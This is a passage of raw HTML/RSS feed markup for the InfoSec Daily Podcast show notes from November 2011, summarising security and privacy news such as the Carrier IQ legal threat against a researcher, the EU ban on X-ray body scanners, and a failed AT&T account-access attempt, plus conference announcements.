style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">describes itself</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> as &quot;the world&#39;s leading provider of Mobile Service Intelligence solutions.&quot; Eckhart concluded that the software, which comes by default on many mobile devices and runs quietly in the background, logs extensive details about users&#39; activities. Eckhart not only documented the functionality of the software, but learned even more about how it works through training materials posted on the Carrier IQ website. Fearing the company would take the files offline after he posted his analysis, he mirrored the training materials to let others independently verify his conclusions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Eckhart was right: Carrier IQ immediately made the files unavailable, but it didn&#39;t stop there. &nbsp;Carrier IQ fired off a</span><a href="https://www.eff.org/sites/default/files/eckhart_cease_desist_demand_redacted.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cease-and-desist letter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (pdf) to Eckhart, claiming that he infringed its copyrights and made unspecified &quot;false allegations&quot; about its software. Among other things, the company demanded that Eckhart turn over contact information for every person who had obtained the files from him, and that he replace his analysis with a statement&mdash;written for him by Carrier IQ&mdash;disavowing his research.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Happily, Eckhart was not cowed by this ham-fisted effort to suppress his findings. &nbsp;Instead, he reached out to EFF. &nbsp;We&#39;re glad he did. &nbsp;As we explained in a</span><a href="https://www.eff.org/sites/default/files/eckhart_c%26d_response.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">letter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (pdf) to Carrier IQ today, Eckhart&#39;s research is protected by fair use and the First Amendment right to free expression. He posted the training materials to teach the public about software that many consumers don&#39;t know about, even though it monitors their everyday activities and raises substantial privacy concerns. &nbsp;As the</span><a href="http://www.law.cornell.edu/uscode/17/107.shtml"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Copyright Act says</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, &quot;the fair use of a copyrighted work . . . for purposes such as criticism, comment, news reporting . . . or research, is not an infringement of copyright.&quot; Furthermore, Eckhart&#39;s analysis is just the kind of speech that that the First Amendment is meant to protect&mdash;public commentary that will help consumers better understand the products they use and help researchers investigate those products. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Given the weakness of its legal position, we have to conclude that Carrier IQ&#39;s real goal is to suppress Eckhart&rsquo;s research and prevent others from verifying his findings. But as we&#39;ve long said, the best way to counter speech you don&#39;t like is more speech&mdash;not baseless legal threats to silence your critics. Carrier IQ didn&#39;t get the memo on this. (Nor, apparently, has it heard of the</span><a href="http://en.wikipedia.org/wiki/Streisand_effect"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Streisand Effect</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.) Hopefully it has now. &nbsp;&nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.propublica.org/article/europe-bans-x-ray-body-scanners-used-at-u.s.-airports"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.propublica.org/article/europe-bans-x-ray-body-scanners-used-at-u.s.-airports</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Union on (last)Monday prohibited the use of X-ray body scanners in European airports, parting ways with the U.S. Transportation Security Administration, which has deployed hundreds of the scanners as a way to screen millions of airline passengers for explosives hidden under clothing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Commission, which enforces common policies of the EU&#39;s 27 member countries, adopted the rule &ldquo;in order not to risk jeopardizing citizens&rsquo; health and safety.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a ProPublica/PBS NewsHour investigation detailed earlier this month, X-ray body scanners use ionizing radiation, a form of energy that has been shown to damage DNA and cause cancer. Although the amount of radiation is extremely low, equivalent to the radiation a person would receive in a few minutes of flying, several research studies have concluded that a small number of cancer cases would result from scanning hundreds of millions of passengers a year.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">European countries will be allowed to use an alternative body scanner, on that relies on radio frequency waves, which have not been linked to cancer. The TSA has also deployed hundreds of those machines &ndash; known as millimeter-wave scanners &ndash; in U.S. airports. But unlike Europe, it has decided to deploy both types of scanners.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The TSA would not comment specifically on the EU&rsquo;s decision. But in a statement, TSA spokesman Mike McCarthy said, &ldquo;As one of our many layers of security, TSA deploys the most advanced technology available to provide the best opportunity to detect dangerous items, such as explosives.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We rigorously test our technology to ensure it meets our high detection and safety standards before it is placed in airports,&rdquo; he continued. &ldquo;Since January 2010, advanced imaging technology has detected more than 300 dangerous or illegal items on passengers in U.S. airports nationwide.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Body scanners have been controversial in the United States since they were first deployed in prisons in the late 1990s and then in airports for tests after 9/11. Most of the controversy has focused on privacy because the machines can produce graphic images. But the manufacturers have since installed privacy filters.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the TSA began deploying hundreds of body scanners after the failed underwear bombing on Christmas Day 2009, several scientists began to raise concerns about the health risks of the X-ray scanner, noting that even low levels of radiation would increase the risk of cancer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As part of our investigation, ProPublica surveyed foreign countries&rsquo; security policies and found that only a few nations used the X-ray scanner. The United Kingdom uses them but only for secondary screening, such as when a passenger triggers the metal detector or raises suspicion.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Under the new European Commission policy, the U.K. will be allowed to complete a trial of the X-ray scanners but not to deploy them on a permanent basis when the trial ends, said Helen Kearns, spokeswoman for the European transport commissioner, Siim Kallas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;These new rules ensure that where this technology is used it will be covered by EU-wide standards on detection capability as well as strict safeguards to protect health and fundamental rights,&rdquo; Kallas said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Five-hundred body scanners, split about evenly between the two technologies, are deployed in U.S. airports. The X-ray scanner, or backscatter, which looks like two large blue boxes, is used at major airports, including Los Angeles International Airport, John F. Kennedy in New York and Chicago&#39;s O&rsquo;Hare. The millimeter-wave scanner, which looks like a round glass booth, is used in San Francisco, Atlanta and Dallas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Within three years, the TSA plans to deploy 1,800 backscatter and millimeter-wave scanners, covering nearly every domestic airport security lane. The TSA has not yet released details on the exact breakdown.</span></p>
<p>	<a href="http://www.infowars.com/despite-eu-ban-uk-makes-radiation-firing-body-scanners-compulsory/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Update:</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ldquo;In spite of the European Commission formally adopting new limits on airport body scanners and outright banning backscatter x-ray scanners pending further studies, the UK will not allow passengers to &ldquo;opt out&rdquo; if they are selected to go through the machines, which will remain in use.&rdquo; </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/failed-att-hack-attempt-couldve-hit-1-million-customers-112211"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/failed-att-hack-attempt-couldve-hit-1-million-customers-112211</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T announced Monday that hackers made an &ldquo;organized and systematic attempt&rdquo; to gain access to nearly one million of their customers&rsquo; online accounts.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a</span><a href="http://www.bloomberg.com/news/2011-11-21/at-t-tells-customers-of-systematic-hack-attempt.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Bloomberg report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the phone company assured customers in an e-mail their accounts were intact.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We do not believe that the perpetrators of this attack obtained access to your online account or any of the information contained in that account.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While no information appears to have been breached here, AT&amp;T spokesman Mark Siegel announced the company has launched an ongoing investigation to further identify the hack&rsquo;s intent.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T, the largest phone company in the world, has 100.7 million wireless subscribers, yet only 1 percent of them, approximately one million customers, were targeted by the attack, in which hackers used automated scripts to &nbsp;try to match up customers telephone numbers with account numbers and gain access to accounts.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3188/0/infosec-daily-podcast-episode-529.mp3" length="18104255" type="audio/mpeg" />
		<itunes:duration>0:37:40</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to all[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://mashable.com/2011/11/22/google-2-step-verification-gmail/
	Did you know that Google offers 2-step login verification for Gmail accounts? The feature has been around a while, and now Google has written a reminder for all users who need an extra layer of security for their Gmail account and other services connected to it.
	In addition to logging into Gmail with your email and password, with 2-step verification you&#8217;ll have to go through the added trouble of entering a code Google will send to your phone. This will &#8220;approve&#8221; the computer you&#8217;re currently logging in from for 30 days, so you don&#8217;t have to do this every time you log in.
	If you have a smartphone, you can also generate the code on your phone using the Google Authenticator app.
	Yes, entering an additional code is somewhat of a nuisance, but it would also greatly complicate matters for anyone who has gotten a hold of your password. To successfully log into your Gmail account, that person would also need to obtain your phone.
	In its blog post, Google emphasizes that this reminder is just &#8220;general security advice, not an indication of an attack or compromise,&#8221; but one has to wonder if the Redmond giant is seeing an increased number of complaints from users whose Gmail accounts have been compromised.
	To enable 2-step verification for Gmail, go here. 
	Source: https://support.apple.com/kb/HT5030
	Available for: Mac OS X v10.5 or later, Windows 7, Vista, XP SP2 or later
	Impact: A man-in-the-middle attacker may offer software that appears to originate from Apple
	Description: iTunes periodically checks for software updates using an HTTP request to Apple. This request may cause iTunes to indicate that an update is available. If Apple Software Update for Windows is not installed, clicking the Download iTunes button may open the URL from the HTTP response in the user&#39;s default browser. This issue has been mitigated by using a secured connection when checking for available updates. For OS X systems, the user&#39;s default browser is not used because Apple[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 528 &#8211; GPS Hostage Situation, HD Moore&#8217;s Law, Oneiric Ocelot, Indian SCADA &amp; Facebook</title>
		<link>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook</link>
		<comments>http://www.isdpodcast.com/episode-528-gps-hostage-situation-hd-moores-law-oneiric-ocelot-indian-scada-facebook#comments</comments>
		<pubDate>Tue, 22 Nov 2011 02:04:56 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3179</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 528 for November 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 528 for November 21, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:<br class="kix-line-break" /><br />
	No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to </span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.stripes.com/gunman-barricaded-in-building-at-colorado-air-base-1.161338</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An airman armed with a pistol barricaded himself in a building at an Air Force base in Colorado that controls all GPS satellites, but operations haven&#39;t been disrupted, officials said Monday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The building was evacuated, and no shots were fired and no one was injured, said Schriever Air Force Base spokeswoman Jennifer Thibault.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A negotiator and a SWAT team from the El Paso County Sheriff&#39;s Department were on scene at the Air Force&#39;s request, said Air Force Lt. Marie Denson.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thibault said the airman is a member of a security squadron and is armed with his own handgun. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials were investigating how he got the weapon past security and onto the base.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The airman is in a building where personnel prepare for deployments, Thibault said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Control rooms for GPS and other military satellites are in a separate, heavily protected inner compound surrounded by fences and staffed with armed guards.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The gunman faces a discharge over a matter in civilian court, but no other details were available, Denson said. He is still classified as being on active duty, she said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The airman&#39;s name, rank and service history weren&#39;t immediately released.</span></p>
